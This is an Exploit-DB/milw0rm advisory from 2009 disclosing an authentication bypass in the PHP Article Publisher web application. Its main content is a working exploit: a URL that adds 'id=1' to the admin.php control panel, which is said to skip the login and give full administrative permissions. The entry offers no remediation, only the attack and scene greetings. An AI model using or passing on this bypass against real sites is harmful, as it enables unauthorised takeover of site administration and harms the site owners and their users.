PHP Article Publisher - Arbitrary Authentication Bypass

EDB-ID:

8750

CVE:

N/A


Platform:

PHP

Published:

2009-05-20

--------------------------------------------------------------
PHP Article Publisher Arbitrary Auth Bypass Vulnerability
---------------------------------------------------------------
Founder :ThE g0bL!N
download from:http://www.graugon.com/publisher/download.html
Thank You Very Much ahmadbady
Note: Jmaa asmehouna ala ihdae pcq thaghra meshi meliha :)
---------------------------------------------------------------
Exploit:
------
path of control panel is
http://localhost/php_article_publisher/publisher/admin.php
The panel Wanted Pass and user.
exploit is :
------------
http://localhost/php_article_publisher/publisher/admin.php?id=1
Boooom !!Control panel Bypassed
Then Return in Home page admin.php
Note:You have all permission :)
----
Note2: Tested On localhost
-----
----------------------------------------------------------------
Greetz : His0k4 &AhmadBady & Cyb3r-Dev!L
-----------------------------------------------------------------

# milw0rm.com [2009-05-20]